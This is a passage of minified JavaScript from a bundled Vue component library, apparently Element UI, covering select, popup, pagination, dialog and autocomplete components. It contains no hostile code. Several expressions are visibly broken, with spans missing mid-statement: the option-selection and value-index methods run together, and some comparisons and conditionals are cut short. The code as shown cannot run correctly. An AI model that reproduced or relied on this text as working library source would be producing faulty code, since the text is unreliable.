ndex:-1,query:"",previousQuery:null,inputHovering:!1,currentPlaceholder:"",menuVisibleOnFocus:!1,isOnComposition:!1,isSilentBlur:!1}},watch:{selectDisabled:function(){var e=this;this.$nextTick((function(){e.resetInputHeight()}))},propPlaceholder:function(e){this.cachedPlaceHolder=this.currentPlaceholder=e},value:function(e,t){this.multiple&&(this.resetInputHeight(),e&&e.length>0||this.$refs.input&&""!==this.query?this.currentPlaceholder="":this.currentPlaceholder=this.cachedPlaceHolder,this.filterable&&!this.reserveKeyword&&(this.query="",this.handleQueryChange(this.query))),this.setSelected(),this.filterable&&!this.multiple&&(this.inputLength=20),Object(I["valueEquals"])(e,t)||this.dispatch("ElFormItem","el.form.change",e)},visible:function(e){var t=this;e?(this.broadcast("ElSelectDropdown","updatePopper"),this.filterable&&(this.query=this.remote?"":this.selectedLabel,this.handleQueryChange(this.query),this.multiple?this.$refs.input.focus():(this.remote||(this.broadcast("ElOption","queryChange",""),this.broadcast("ElOptionGroup","queryChange")),this.selectedLabel&&(this.currentPlaceholder=this.selectedLabel,this.selectedLabel="")))):(this.broadcast("ElSelectDropdown","destroyPopper"),this.$refs.input&&this.$refs.input.blur(),this.query="",this.previousQuery=null,this.selectedLabel="",this.inputLength=20,this.menuVisibleOnFocus=!1,this.resetHoverIndex(),this.$nextTick((function(){t.$refs.input&&""===t.$refs.input.value&&0===t.selected.length&&(t.currentPlaceholder=t.cachedPlaceHolder)})),this.multiple||(this.selected&&(this.filterable&&this.allowCreate&&this.createdSelected&&this.createdLabel?this.selectedLabel=this.createdLabel:this.selectedLabel=this.selected.currentLabel,this.filterable&&(this.query=this.selectedLabel)),this.filterable&&(this.currentPlaceholder=this.cachedPlaceHolder))),this.$emit("visible-change",e)},options:function(){var e=this;if(!this.$isServer){this.$nextTick((function(){e.broadcast("ElSelectDropdown","updatePopper")})),this.multiple&&this.resetInputHeight();var t=this.$el.querySelectorAll("input");-1===[].indexOf.call(t,document.activeElement)&&this.setSelected(),this.defaultFirstOption&&(this.filterable||this.remote)&&this.filteredOptionsCount&&this.checkDefaultFirstOption()}}},methods:{handleNavigate:function(e){this.isOnComposition||this.navigateOptions(e)},handleComposition:function(e){var t=this,i=e.target.value;if("compositionend"===e.type)this.isOnComposition=!1,this.$nextTick((function(e){return t.handleQueryChange(i)}));else{var n=i[i.length-1]||"";this.isOnComposition=!Object(F["isKorean"])(n)}},handleQueryChange:function(e){var t=this;this.previousQuery===e||this.isOnComposition||(null!==this.previousQuery||"function"!==typeof this.filterMethod&&"function"!==typeof this.remoteMethod?(this.previousQuery=e,this.$nextTick((function(){t.visible&&t.broadcast("ElSelectDropdown","updatePopper")})),this.hoverIndex=-1,this.multiple&&this.filterable&&this.$nextTick((function(){var e=15*t.$refs.input.value.length+20;t.inputLength=t.collapseTags?Math.min(50,e):e,t.managePlaceholder(),t.resetInputHeight()})),this.remote&&"function"===typeof this.remoteMethod?(this.hoverIndex=-1,this.remoteMethod(e)):"function"===typeof this.filterMethod?(this.filterMethod(e),this.broadcast("ElOptionGroup","queryChange")):(this.filteredOptionsCount=this.optionsCount,this.broadcast("ElOption","queryChange",e),this.broadcast("ElOptionGroup","queryChange")),this.defaultFirstOption&&(this.filterable||this.remote)&&this.filteredOptionsCount&&this.checkDefaultFirstOption()):this.previousQuery=e)},scrollToOption:function(e){var t=Array.isArray(e)&&e[0]?e[0].$el:e.$el;if(this.$refs.popper&&t){var i=this.$refs.popper.$el.querySelector(".el-select-dropdown__wrap");N()(i,t)}this.$refs.scrollbar&&this.$refs.scrollbar.handleScroll()},handleMenuEnter:function(){var e=this;this.$nextTick((function(){return e.scrollToOption(e.selected)}))},emitChange:function(e){Object(I["valueEquals"])(this.value,e)||this.$emit("change",e)},getOption:function(e){for(var t=void 0,i="[object object]"===Object.prototype.toString.call(e).toLowerCase(),n="[object null]"===Object.prototype.toString.call(e).toLowerCase(),s="[object undefined]"===Object.prototype.toString.call(e).toLowerCase(),r=this.cachedOptions.length-1;r>=0;r--){var a=this.cachedOptions[r],o=i?Object(I["getValueByPath"])(a.value,this.valueKey)===Object(I["getValueByPath"])(e,this.valueKey):a.value===e;if(o){t=a;break}}if(t)return t;var l=i||n||s?"":String(e),c={value:e,currentLabel:l};return this.multiple&&(c.hitState=!1),c},setSelected:function(){var e=this;if(!this.multiple){var t=this.getOption(this.value);return t.created?(this.createdLabel=t.currentLabel,this.createdSelected=!0):this.createdSelected=!1,this.selectedLabel=t.currentLabel,this.selected=t,void(this.filterable&&(this.query=this.selectedLabel))}var i=[];Array.isArray(this.value)&&this.value.forEach((function(t){i.push(e.getOption(t))})),this.selected=i,this.$nextTick((function(){e.resetInputHeight()}))},handleFocus:function(e){this.softFocus?this.softFocus=!1:((this.automaticDropdown||this.filterable)&&(this.filterable&&!this.visible&&(this.menuVisibleOnFocus=!0),this.visible=!0),this.$emit("focus",e))},blur:function(){this.visible=!1,this.$refs.reference.blur()},handleBlur:function(e){var t=this;setTimeout((function(){t.isSilentBlur?t.isSilentBlur=!1:t.$emit("blur",e)}),50),this.softFocus=!1},handleClearClick:function(e){this.deleteSelected(e)},doDestroy:function(){this.$refs.popper&&this.$refs.popper.doDestroy()},handleClose:function(){this.visible=!1},toggleLastOptionHitState:function(e){if(Array.isArray(this.selected)){var t=this.selected[this.selected.length-1];if(t)return!0===e||!1===e?(t.hitState=e,e):(t.hitState=!t.hitState,t.hitState)}},deletePrevTag:function(e){if(e.target.value.length<=0&&!this.toggleLastOptionHitState()){var t=this.value.slice();t.pop(),this.$emit("input",t),this.emitChange(t)}},managePlaceholder:function(){""!==this.currentPlaceholder&&(this.currentPlaceholder=this.$refs.input.value?"":this.cachedPlaceHolder)},resetInputState:function(e){8!==e.keyCode&&this.toggleLastOptionHitState(!1),this.inputLength=15*this.$refs.input.value.length+20,this.resetInputHeight()},resetInputHeight:function(){var e=this;this.collapseTags&&!this.filterable||this.$nextTick((function(){if(e.$refs.reference){var t=e.$refs.reference.$el.childNodes,i=[].filter.call(t,(function(e){return"INPUT"===e.tagName}))[0],n=e.$refs.tags,s=n?Math.round(n.getBoundingClientRect().height):0,r=e.initialInputHeight||40;i.style.height=0===e.selected.length?r+"px":Math.max(n?s+(s>r?6:0):0,r)+"px",e.visible&&!1!==e.emptyText&&e.broadcast("ElSelectDropdown","updatePopper")}}))},resetHoverIndex:function(){var e=this;setTimeout((function(){e.multiple?e.selected.length>0?e.hoverIndex=Math.min.apply(null,e.selected.map((function(t){return e.options.indexOf(t)}))):e.hoverIndex=-1:e.hoverIndex=e.options.indexOf(e.selected)}),300)},handleOptionSelect:function(e,t){var i=this;if(this.multiple){var n=(this.value||[]).slice(),s=this.getValueIndex(n,e.value);s>-1?n.splice(s,1):(this.multipleLimit<=0||n.length0&&void 0!==arguments[0]?arguments[0]:[],t=arguments[1],i="[object object]"===Object.prototype.toString.call(t).toLowerCase();if(i){var n=this.valueKey,s=-1;return e.some((function(e,i){return Object(I["getValueByPath"])(e,n)===Object(I["getValueByPath"])(t,n)&&(s=i,!0)})),s}return e.indexOf(t)},toggleMenu:function(){this.selectDisabled||(this.menuVisibleOnFocus?this.menuVisibleOnFocus=!1:this.visible=!this.visible,this.visible&&(this.$refs.input||this.$refs.reference).focus())},selectOption:function(){this.visible?this.options[this.hoverIndex]&&this.handleOptionSelect(this.options[this.hoverIndex]):this.toggleMenu()},deleteSelected:function(e){e.stopPropagation();var t=this.multiple?[]:"";this.$emit("input",t),this.emitChange(t),this.visible=!1,this.$emit("clear")},deleteTag:function(e,t){var i=this.selected.indexOf(t);if(i>-1&&!this.selectDisabled){var n=this.value.slice();n.splice(i,1),this.$emit("input",n),this.emitChange(n),this.$emit("remove-tag",t.value)}e.stopPropagation()},onInputChange:function(){this.filterable&&this.query!==this.selectedLabel&&(this.query=this.selectedLabel,this.handleQueryChange(this.query))},onOptionDestroy:function(e){e>-1&&(this.optionsCount--,this.filteredOptionsCount--,this.options.splice(e,1))},resetInputWidth:function(){this.inputWidth=this.$refs.reference.$el.getBoundingClientRect().width},handleResize:function(){this.resetInputWidth(),this.multiple&&this.resetInputHeight()},checkDefaultFirstOption:function(){this.hoverIndex=-1;for(var e=!1,t=this.options.length-1;t>=0;t--)if(this.options[t].created){e=!0,this.hoverIndex=t;break}if(!e)for(var i=0;i!==this.options.length;++i){var n=this.options[i];if(this.query){if(!n.disabled&&!n.groupDisabled&&n.visible){this.hoverIndex=i;break}}else if(n.itemSelected){this.hoverIndex=i;break}}},getValueKey:function(e){return"[object object]"!==Object.prototype.toString.call(e.value).toLowerCase()?e.value:Object(I["getValueByPath"])(e.value,this.valueKey)}},created:function(){var e=this;this.cachedPlaceHolder=this.currentPlaceholder=this.propPlaceholder,this.multiple&&!Array.isArray(this.value)&&this.$emit("input",[]),!this.multiple&&Array.isArray(this.value)&&this.$emit("input",""),this.debouncedOnInputChange=O()(this.debounce,(function(){e.onInputChange()})),this.debouncedQueryChange=O()(this.debounce,(function(t){e.handleQueryChange(t.target.value)})),this.$on("handleOptionClick",this.handleOptionSelect),this.$on("setSelected",this.setSelected)},mounted:function(){var e=this;this.multiple&&Array.isArray(this.value)&&this.value.length>0&&(this.currentPlaceholder=""),Object(P["addResizeListener"])(this.$el,this.handleResize);var t=this.$refs.reference;if(t&&t.$el){var i={medium:36,small:32,mini:28},n=t.$el.querySelector("input");this.initialInputHeight=n.getBoundingClientRect().height||i[this.selectSize]}this.remote&&this.multiple&&this.resetInputHeight(),this.$nextTick((function(){t&&t.$el&&(e.inputWidth=t.$el.getBoundingClientRect().width)})),this.setSelected()},beforeDestroy:function(){this.$el&&this.handleResize&&Object(P["removeResizeListener"])(this.$el,this.handleResize)}},A=L,V=Object(y["a"])(A,n,s,!1,null,null,null);V.options.__file="packages/select/src/select.vue";var B=V.exports;B.install=function(e){e.component(B.name,B)};t["default"]=B}})},5128:function(e,t,i){"use strict";t.__esModule=!0,t.PopupManager=void 0;var n=i("2b0e"),s=d(n),r=i("7f4d"),a=d(r),o=i("4b26"),l=d(o),c=i("e62d"),u=d(c),h=i("5924");function d(e){return e&&e.__esModule?e:{default:e}}var p=1,f=void 0;t.default={props:{visible:{type:Boolean,default:!1},openDelay:{},closeDelay:{},zIndex:{},modal:{type:Boolean,default:!1},modalFade:{type:Boolean,default:!0},modalClass:{},modalAppendToBody:{type:Boolean,default:!1},lockScroll:{type:Boolean,default:!0},closeOnPressEscape:{type:Boolean,default:!1},closeOnClickModal:{type:Boolean,default:!1}},beforeMount:function(){this._popupId="popup-"+p++,l.default.register(this._popupId,this)},beforeDestroy:function(){l.default.deregister(this._popupId),l.default.closeModal(this._popupId),this.restoreBodyStyle()},data:function(){return{opened:!1,bodyPaddingRight:null,computedBodyPaddingRight:0,withoutHiddenClass:!0,rendered:!1}},watch:{visible:function(e){var t=this;if(e){if(this._opening)return;this.rendered?this.open():(this.rendered=!0,s.default.nextTick((function(){t.open()})))}else this.close()}},methods:{open:function(e){var t=this;this.rendered||(this.rendered=!0);var i=(0,a.default)({},this.$props||this,e);this._closeTimer&&(clearTimeout(this._closeTimer),this._closeTimer=null),clearTimeout(this._openTimer);var n=Number(i.openDelay);n>0?this._openTimer=setTimeout((function(){t._openTimer=null,t.doOpen(i)}),n):this.doOpen(i)},doOpen:function(e){if(!this.$isServer&&(!this.willOpen||this.willOpen())&&!this.opened){this._opening=!0;var t=this.$el,i=e.modal,n=e.zIndex;if(n&&(l.default.zIndex=n),i&&(this._closing&&(l.default.closeModal(this._popupId),this._closing=!1),l.default.openModal(this._popupId,l.default.nextZIndex(),this.modalAppendToBody?void 0:t,e.modalClass,e.modalFade),e.lockScroll)){this.withoutHiddenClass=!(0,h.hasClass)(document.body,"el-popup-parent--hidden"),this.withoutHiddenClass&&(this.bodyPaddingRight=document.body.style.paddingRight,this.computedBodyPaddingRight=parseInt((0,h.getStyle)(document.body,"paddingRight"),10)),f=(0,u.default)();var s=document.documentElement.clientHeight0&&(s||"scroll"===r)&&this.withoutHiddenClass&&(document.body.style.paddingRight=this.computedBodyPaddingRight+f+"px"),(0,h.addClass)(document.body,"el-popup-parent--hidden")}"static"===getComputedStyle(t).position&&(t.style.position="absolute"),t.style.zIndex=l.default.nextZIndex(),this.opened=!0,this.onOpen&&this.onOpen(),this.doAfterOpen()}},doAfterOpen:function(){this._opening=!1},close:function(){var e=this;if(!this.willClose||this.willClose()){null!==this._openTimer&&(clearTimeout(this._openTimer),this._openTimer=null),clearTimeout(this._closeTimer);var t=Number(this.closeDelay);t>0?this._closeTimer=setTimeout((function(){e._closeTimer=null,e.doClose()}),t):this.doClose()}},doClose:function(){this._closing=!0,this.onClose&&this.onClose(),this.lockScroll&&setTimeout(this.restoreBodyStyle,200),this.opened=!1,this.doAfterClose()},doAfterClose:function(){l.default.closeModal(this._popupId),this._closing=!1},restoreBodyStyle:function(){this.modal&&this.withoutHiddenClass&&(document.body.style.paddingRight=this.bodyPaddingRight,(0,h.removeClass)(document.body,"el-popup-parent--hidden")),this.withoutHiddenClass=!0}}},t.PopupManager=l.default},5488:function(e,t,i){"use strict";t.__esModule=!0;var n=i("5924");function s(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var r=function(){function e(){s(this,e)}return e.prototype.beforeEnter=function(e){(0,n.addClass)(e,"collapse-transition"),e.dataset||(e.dataset={}),e.dataset.oldPaddingTop=e.style.paddingTop,e.dataset.oldPaddingBottom=e.style.paddingBottom,e.style.height="0",e.style.paddingTop=0,e.style.paddingBottom=0},e.prototype.enter=function(e){e.dataset.oldOverflow=e.style.overflow,0!==e.scrollHeight?(e.style.height=e.scrollHeight+"px",e.style.paddingTop=e.dataset.oldPaddingTop,e.style.paddingBottom=e.dataset.oldPaddingBottom):(e.style.height="",e.style.paddingTop=e.dataset.oldPaddingTop,e.style.paddingBottom=e.dataset.oldPaddingBottom),e.style.overflow="hidden"},e.prototype.afterEnter=function(e){(0,n.removeClass)(e,"collapse-transition"),e.style.height="",e.style.overflow=e.dataset.oldOverflow},e.prototype.beforeLeave=function(e){e.dataset||(e.dataset={}),e.dataset.oldPaddingTop=e.style.paddingTop,e.dataset.oldPaddingBottom=e.style.paddingBottom,e.dataset.oldOverflow=e.style.overflow,e.style.height=e.scrollHeight+"px",e.style.overflow="hidden"},e.prototype.leave=function(e){0!==e.scrollHeight&&((0,n.addClass)(e,"collapse-transition"),e.style.height=0,e.style.paddingTop=0,e.style.paddingBottom=0)},e.prototype.afterLeave=function(e){(0,n.removeClass)(e,"collapse-transition"),e.style.height="",e.style.overflow=e.dataset.oldOverflow,e.style.paddingTop=e.dataset.oldPaddingTop,e.style.paddingBottom=e.dataset.oldPaddingBottom},e}();t.default={name:"ElCollapseTransition",functional:!0,render:function(e,t){var i=t.children,n={on:new r};return e("transition",n,i)}}},5924:function(e,t,i){"use strict";t.__esModule=!0,t.isInContainer=t.getScrollContainer=t.isScroll=t.getStyle=t.once=t.off=t.on=void 0;var n="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"===typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e};t.hasClass=m,t.addClass=v,t.removeClass=g,t.setStyle=y;var s=i("2b0e"),r=a(s);function a(e){return e&&e.__esModule?e:{default:e}}var o=r.default.prototype.$isServer,l=/([\:\-\_]+(.))/g,c=/^moz([A-Z])/,u=o?0:Number(document.documentMode),h=function(e){return(e||"").replace(/^[\s\uFEFF]+|[\s\uFEFF]+$/g,"")},d=function(e){return e.replace(l,(function(e,t,i,n){return n?i.toUpperCase():i})).replace(c,"Moz$1")},p=t.on=function(){return!o&&document.addEventListener?function(e,t,i){e&&t&&i&&e.addEventListener(t,i,!1)}:function(e,t,i){e&&t&&i&&e.attachEvent("on"+t,i)}}(),f=t.off=function(){return!o&&document.removeEventListener?function(e,t,i){e&&t&&e.removeEventListener(t,i,!1)}:function(e,t,i){e&&t&&e.detachEvent("on"+t,i)}}();t.once=function(e,t,i){var n=function n(){i&&i.apply(this,arguments),f(e,t,n)};p(e,t,n)};function m(e,t){if(!e||!t)return!1;if(-1!==t.indexOf(" "))throw new Error("className should not contain space.");return e.classList?e.classList.contains(t):(" "+e.className+" ").indexOf(" "+t+" ")>-1}function v(e,t){if(e){for(var i=e.className,n=(t||"").split(" "),s=0,r=n.length;sn.top&&i.right>n.left&&i.left0?i("li",{staticClass:"number",class:{active:1===e.currentPage,disabled:e.disabled}},[e._v("1")]):e._e(),e.showPrevMore?i("li",{staticClass:"el-icon more btn-quickprev",class:[e.quickprevIconClass,{disabled:e.disabled}],on:{mouseenter:function(t){e.onMouseenter("left")},mouseleave:function(t){e.quickprevIconClass="el-icon-more"}}}):e._e(),e._l(e.pagers,(function(t){return i("li",{key:t,staticClass:"number",class:{active:e.currentPage===t,disabled:e.disabled}},[e._v(e._s(t))])})),e.showNextMore?i("li",{staticClass:"el-icon more btn-quicknext",class:[e.quicknextIconClass,{disabled:e.disabled}],on:{mouseenter:function(t){e.onMouseenter("right")},mouseleave:function(t){e.quicknextIconClass="el-icon-more"}}}):e._e(),e.pageCount>1?i("li",{staticClass:"number",class:{active:e.currentPage===e.pageCount,disabled:e.disabled}},[e._v(e._s(e.pageCount))]):e._e()],2)},s=[];n._withStripped=!0;var r={name:"ElPager",props:{currentPage:Number,pageCount:Number,pagerCount:Number,disabled:Boolean},watch:{showPrevMore:function(e){e||(this.quickprevIconClass="el-icon-more")},showNextMore:function(e){e||(this.quicknextIconClass="el-icon-more")}},methods:{onPagerClick:function(e){var t=e.target;if("UL"!==t.tagName&&!this.disabled){var i=Number(e.target.textContent),n=this.pageCount,s=this.currentPage,r=this.pagerCount-2;-1!==t.className.indexOf("more")&&(-1!==t.className.indexOf("quickprev")?i=s-r:-1!==t.className.indexOf("quicknext")&&(i=s+r)),isNaN(i)||(i<1&&(i=1),i>n&&(i=n)),i!==s&&this.$emit("change",i)}},onMouseenter:function(e){this.disabled||("left"===e?this.quickprevIconClass="el-icon-d-arrow-left":this.quicknextIconClass="el-icon-d-arrow-right")}},computed:{pagers:function(){var e=this.pagerCount,t=(e-1)/2,i=Number(this.currentPage),n=Number(this.pageCount),s=!1,r=!1;n>e&&(i>e-t&&(s=!0),i4&&e<22&&e%2===1},default:7},currentPage:{type:Number,default:1},layout:{default:"prev, pager, next, jumper, ->, total"},pageSizes:{type:Array,default:function(){return[10,20,30,40,50,100]}},popperClass:String,prevText:String,nextText:String,background:Boolean,disabled:Boolean,hideOnSinglePage:Boolean},data:function(){return{internalCurrentPage:1,internalPageSize:0,lastEmittedPage:-1,userChangePageSize:!1}},render:function(e){var t=this.layout;if(!t)return null;if(this.hideOnSinglePage&&(!this.internalPageCount||1===this.internalPageCount))return null;var i=e("div",{class:["el-pagination",{"is-background":this.background,"el-pagination--small":this.small}]}),n={prev:e("prev"),jumper:e("jumper"),pager:e("pager",{attrs:{currentPage:this.internalCurrentPage,pageCount:this.internalPageCount,pagerCount:this.pagerCount,disabled:this.disabled},on:{change:this.handleCurrentChange}}),next:e("next"),sizes:e("sizes",{attrs:{pageSizes:this.pageSizes}}),slot:e("slot",[this.$slots.default?this.$slots.default:""]),total:e("total")},s=t.split(",").map((function(e){return e.trim()})),r=e("div",{class:"el-pagination__rightwrapper"}),a=!1;return i.children=i.children||[],r.children=r.children||[],s.forEach((function(e){"->"!==e?a?r.children.push(n[e]):i.children.push(n[e]):a=!0})),a&&i.children.unshift(r),i},components:{Prev:{render:function(e){return e("button",{attrs:{type:"button",disabled:this.$parent.disabled||this.$parent.internalCurrentPage<=1},class:"btn-prev",on:{click:this.$parent.prev}},[this.$parent.prevText?e("span",[this.$parent.prevText]):e("i",{class:"el-icon el-icon-arrow-left"})])}},Next:{render:function(e){return e("button",{attrs:{type:"button",disabled:this.$parent.disabled||this.$parent.internalCurrentPage===this.$parent.internalPageCount||0===this.$parent.internalPageCount},class:"btn-next",on:{click:this.$parent.next}},[this.$parent.nextText?e("span",[this.$parent.nextText]):e("i",{class:"el-icon el-icon-arrow-right"})])}},Sizes:{mixins:[g.a],props:{pageSizes:Array},watch:{pageSizes:{immediate:!0,handler:function(e,t){Object(b["valueEquals"])(e,t)||Array.isArray(e)&&(this.$parent.internalPageSize=e.indexOf(this.$parent.pageSize)>-1?this.$parent.pageSize:this.pageSizes[0])}}},render:function(e){var t=this;return e("span",{class:"el-pagination__sizes"},[e("el-select",{attrs:{value:this.$parent.internalPageSize,popperClass:this.$parent.popperClass||"",size:"mini",disabled:this.$parent.disabled},on:{input:this.handleChange}},[this.pageSizes.map((function(i){return e("el-option",{attrs:{value:i,label:i+t.t("el.pagination.pagesize")}})}))])])},components:{ElSelect:h.a,ElOption:p.a},methods:{handleChange:function(e){e!==this.$parent.internalPageSize&&(this.$parent.internalPageSize=e=parseInt(e,10),this.$parent.userChangePageSize=!0,this.$parent.$emit("update:pageSize",e),this.$parent.$emit("size-change",e))}}},Jumper:{mixins:[g.a],components:{ElInput:m.a},data:function(){return{userInput:null}},watch:{"$parent.internalCurrentPage":function(){this.userInput=null}},methods:{handleKeyup:function(e){var t=e.keyCode,i=e.target;13===t&&this.handleChange(i.value)},handleInput:function(e){this.userInput=e},handleChange:function(e){this.$parent.internalCurrentPage=this.$parent.getValidCurrentPage(e),this.$parent.emitChange(),this.userInput=null}},render:function(e){return e("span",{class:"el-pagination__jump"},[this.t("el.pagination.goto"),e("el-input",{class:"el-pagination__editor is-in-pagination",attrs:{min:1,max:this.$parent.internalPageCount,value:null!==this.userInput?this.userInput:this.$parent.internalCurrentPage,type:"number",disabled:this.$parent.disabled},nativeOn:{keyup:this.handleKeyup},on:{input:this.handleInput,change:this.handleChange}}),this.t("el.pagination.pageClassifier")])}},Total:{mixins:[g.a],render:function(e){return"number"===typeof this.$parent.total?e("span",{class:"el-pagination__total"},[this.t("el.pagination.total",{total:this.$parent.total})]):""}},Pager:c},methods:{handleCurrentChange:function(e){this.internalCurrentPage=this.getValidCurrentPage(e),this.userChangePageSize=!0,this.emitChange()},prev:function(){if(!this.disabled){var e=this.internalCurrentPage-1;this.internalCurrentPage=this.getValidCurrentPage(e),this.$emit("prev-click",this.internalCurrentPage),this.emitChange()}},next:function(){if(!this.disabled){var e=this.internalCurrentPage+1;this.internalCurrentPage=this.getValidCurrentPage(e),this.$emit("next-click",this.internalCurrentPage),this.emitChange()}},getValidCurrentPage:function(e){e=parseInt(e,10);var t="number"===typeof this.internalPageCount,i=void 0;return t?e<1?i=1:e>this.internalPageCount&&(i=this.internalPageCount):(isNaN(e)||e<1)&&(i=1),(void 0===i&&isNaN(e)||0===i)&&(i=1),void 0===i?e:i},emitChange:function(){var e=this;this.$nextTick((function(){(e.internalCurrentPage!==e.lastEmittedPage||e.userChangePageSize)&&(e.$emit("current-change",e.internalCurrentPage),e.lastEmittedPage=e.internalCurrentPage,e.userChangePageSize=!1)}))}},computed:{internalPageCount:function(){return"number"===typeof this.total?Math.max(1,Math.ceil(this.total/this.internalPageSize)):"number"===typeof this.pageCount?Math.max(1,this.pageCount):null}},watch:{currentPage:{immediate:!0,handler:function(e){this.internalCurrentPage=this.getValidCurrentPage(e)}},pageSize:{immediate:!0,handler:function(e){this.internalPageSize=isNaN(e)?10:e}},internalCurrentPage:{immediate:!0,handler:function(e){this.$emit("update:currentPage",e),this.lastEmittedPage=-1}},internalPageCount:function(e){var t=this.internalCurrentPage;e>0&&0===t?this.internalCurrentPage=1:t>e&&(this.internalCurrentPage=0===e?1:e,this.userChangePageSize&&this.emitChange()),this.userChangePageSize=!1}},install:function(e){e.component(y.name,y)}},_=y,x=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"dialog-fade"},on:{"after-enter":e.afterEnter,"after-leave":e.afterLeave}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.visible,expression:"visible"}],staticClass:"el-dialog__wrapper",on:{click:function(t){return t.target!==t.currentTarget?null:e.handleWrapperClick(t)}}},[i("div",{key:e.key,ref:"dialog",class:["el-dialog",{"is-fullscreen":e.fullscreen,"el-dialog--center":e.center},e.customClass],style:e.style,attrs:{role:"dialog","aria-modal":"true","aria-label":e.title||"dialog"}},[i("div",{staticClass:"el-dialog__header"},[e._t("title",[i("span",{staticClass:"el-dialog__title"},[e._v(e._s(e.title))])]),e.showClose?i("button",{staticClass:"el-dialog__headerbtn",attrs:{type:"button","aria-label":"Close"},on:{click:e.handleClose}},[i("i",{staticClass:"el-dialog__close el-icon el-icon-close"})]):e._e()],2),e.rendered?i("div",{staticClass:"el-dialog__body"},[e._t("default")],2):e._e(),e.$slots.footer?i("div",{staticClass:"el-dialog__footer"},[e._t("footer")],2):e._e()])])])},C=[];x._withStripped=!0;var w=i(11),k=i.n(w),S=i(9),D=i.n(S),$=i(3),O=i.n($),E={name:"ElDialog",mixins:[k.a,O.a,D.a],props:{title:{type:String,default:""},modal:{type:Boolean,default:!0},modalAppendToBody:{type:Boolean,default:!0},appendToBody:{type:Boolean,default:!1},lockScroll:{type:Boolean,default:!0},closeOnClickModal:{type:Boolean,default:!0},closeOnPressEscape:{type:Boolean,default:!0},showClose:{type:Boolean,default:!0},width:String,fullscreen:Boolean,customClass:{type:String,default:""},top:{type:String,default:"15vh"},beforeClose:Function,center:{type:Boolean,default:!1},destroyOnClose:Boolean},data:function(){return{closed:!1,key:0}},watch:{visible:function(e){var t=this;e?(this.closed=!1,this.$emit("open"),this.$el.addEventListener("scroll",this.updatePopper),this.$nextTick((function(){t.$refs.dialog.scrollTop=0})),this.appendToBody&&document.body.appendChild(this.$el)):(this.$el.removeEventListener("scroll",this.updatePopper),this.closed||this.$emit("close"),this.destroyOnClose&&this.$nextTick((function(){t.key++})))}},computed:{style:function(){var e={};return this.fullscreen||(e.marginTop=this.top,this.width&&(e.width=this.width)),e}},methods:{getMigratingConfig:function(){return{props:{size:"size is removed."}}},handleWrapperClick:function(){this.closeOnClickModal&&this.handleClose()},handleClose:function(){"function"===typeof this.beforeClose?this.beforeClose(this.hide):this.hide()},hide:function(e){!1!==e&&(this.$emit("update:visible",!1),this.$emit("close"),this.closed=!0)},updatePopper:function(){this.broadcast("ElSelectDropdown","updatePopper"),this.broadcast("ElDropdownMenu","updatePopper")},afterEnter:function(){this.$emit("opened")},afterLeave:function(){this.$emit("closed")}},mounted:function(){this.visible&&(this.rendered=!0,this.open(),this.appendToBody&&document.body.appendChild(this.$el))},destroyed:function(){this.appendToBody&&this.$el&&this.$el.parentNode&&this.$el.parentNode.removeChild(this.$el)}},T=E,P=o(T,x,C,!1,null,null,null);P.options.__file="packages/dialog/src/component.vue";var M=P.exports;M.install=function(e){e.component(M.name,M)};var N=M,I=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("div",{directives:[{name:"clickoutside",rawName:"v-clickoutside",value:e.close,expression:"close"}],staticClass:"el-autocomplete",attrs:{"aria-haspopup":"listbox",role:"combobox","aria-expanded":e.suggestionVisible,"aria-owns":e.id}},[i("el-input",e._b({ref:"input",on:{input:e.handleInput,change:e.handleChange,focus:e.handleFocus,blur:e.handleBlur,clear:e.handleClear},nativeOn:{keydown:[function(t){if(!("button"in t)&&e._k(t.keyCode,"up",38,t.key,["Up","ArrowUp"]))return null;t.preventDefault(),e.highlight(e.highlightedIndex-1)},function(t){if(!("button"in t)&&e._k(t.keyCode,"down",40,t.key,["Down","ArrowDown"]))return null;t.preventDefault(),e.highlight(e.highlightedIndex+1)},function(t){return!("button"in t)&&e._k(t.keyCode,"enter",13,t.key,"Enter")?null:e.handleKeyEnter(t)},function(t){return!("button"in t)&&e._k(t.keyCode,"tab",9,t.key,"Tab")?null:e.close(t)}]}},"el-input",[e.$props,e.$attrs],!1),[e.$slots.prepend?i("template",{slot:"prepend"},[e._t("prepend")],2):e._e(),e.$slots.append?i("template",{slot:"append"},[e._t("append")],2):e._e(),e.$slots.prefix?i("template",{slot:"prefix"},[e._t("prefix")],2):e._e(),e.$slots.suffix?i("template",{slot:"suffix"},[e._t("suffix")],2):e._e()],2),i("el-autocomplete-suggestions",{ref:"suggestions",class:[e.popperClass?e.popperClass:""],attrs:{"visible-arrow":"","popper-options":e.popperOptions,"append-to-body":e.popperAppendToBody,placement:e.placement,id:e.id}},e._l(e.suggestions,(function(t,n){return i("li",{key:n,class:{highlighted:e.highlightedIndex===n},attrs:{id:e.id+"-item-"+n,role:"option","aria-selected":e.highlightedIndex===n},on:{click:function(i){e.select(t)}}},[e._t("default",[e._v("\n "+e._s(t[e.valueKey])+"\n ")],{item:t})],2)})),0)],1)},j=[];I._withStripped=!0;var F=i(16),L=i.n(F),A=i(10),V=i.n(A),B=function(){var e=this,t=e.$createElement,i=e._self._c||t;return i("transition",{attrs:{name:"el-zoom-in-top"},on:{"after-leave":e.doDestroy}},[i("div",{directives:[{name:"show",rawName:"v-show",value:e.showPopper,expression:"showPopper"}],staticClass:"el-autocomplete-suggestion el-popper",class:{"is-loading":!e.parent.hideLoading&&e.parent.loading},style:{width:e.dropdownWidth},attrs:{role:"region"}},[i("el-scrollbar",{attrs:{tag:"ul","wrap-class":"el-autocomplete-suggestion__wrap","view-class":"el-autocomplete-suggestion__list"}},[!e.parent.hideLoading&&e.parent.loading?i("li",[i("i",{staticClass:"el-icon-loading"})]):e._t("default")],2)],1)])},z=[];B._withStripped=!0;var R=i(5),H=i.n(R),W=i(18),q=i.n(W),Y={components:{ElScrollbar:q.a},mixins:[H.a,O.a],componentName:"ElAutocompleteSuggestions",data:function(){return{parent:this.$parent,dropdownWidth:""}},props:{options:{default:function(){return{gpuAcceleration:!1}}},id:String},methods:{select:function(e){this.dispatch("ElAutocomplete","item-click",e)}},updated:function(){var 